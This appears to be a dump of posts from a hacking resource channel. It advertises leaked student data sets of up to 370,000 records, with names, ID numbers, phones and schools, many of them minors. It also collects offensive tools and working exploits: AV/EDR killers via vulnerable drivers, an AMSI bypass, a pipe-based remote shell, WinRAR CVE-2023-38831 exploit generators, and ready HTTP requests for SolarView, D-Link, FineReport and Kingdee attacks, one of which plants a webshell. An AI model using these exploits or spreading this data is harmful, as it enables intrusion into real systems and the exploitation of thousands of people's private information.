Guangdong student data, 10W (100,000) records.xlsx
18.3 MB
High school students.xlsx
12.1 MB
High school student data, 14W+ (140,000+)
Name + gender + ID card number + date of birth + phone + school + class, etc.
Student data, kindergarten-primary-junior high-senior high-vocational-university, 37W+ (370,000+) records.zip
91.5 MB
Domestic student data.xls
1.9 MB
Domestic student data, 1.3W+ (13,000+) records
Contents: name, phone, ID card number, email, school
Using a BYOVD attack to kill AV/EDR
SharpBlackout is an adaptation of the @Blackout project, originally developed in C++ by @ZeroMemoryEx, which uses the gmer (BYOVD) driver to remove AV/EDR.
https://github.com/dmcxblue/SharpBlackout
GitHub - ZeroMemoryEx/Blackout: kill anti-malware protected processes ( BYOVD )
SolarView solar power generation / solar power monitoring system command execution
fofa.info
body="SolarView Compact" && title=="Top"
Command: cat${IFS}/etc/passwd
POST /conf_mail.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
Affects jp
GET /downloader.php?file=%3Bid%00.zip HTTP/1.1
Interactive remote shell access via named pipes and the SMB protocol
https://github.com/DarkCoderSc/SharpShellPipe
WinRAR vulnerability exp
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
GitHub - b1tg/CVE-2023-38831-winrar-exploit: CVE-2023-38831 winrar exploit generator
ๆ้ไบxssๆกไพ0822-7.pdf
Password: santiankejian.cves.io0822
D-LINK-DAR-8000-10 remote command execution PoC
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3. Access the shell directly
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
FanRuan (FineReport) reporting system: obtaining administrator privileges
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
Kingdee Cloud RCE vulnerability PoC
Affected platforms
6.x --> 6.2.1012.4
7.x --> 7.0.352.16, 7.7.0.202111
8.x --> 8.0.0.202205, 8.1.0.20221110
Generate the deserialization payload:
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload value","format":"3"}
WinRAR code execution: a very simple one-click exploitation tool
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before versions 6.23 - ignis-sec/CVE-2023-38831-RaRCE
Latest AMSI bypass method
Another way to bypass AMSI through the Windows process debugger mechanism
https://github.com/MzHmO/DebugAmsi
GitHub - MzHmO/DebugAmsi: DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.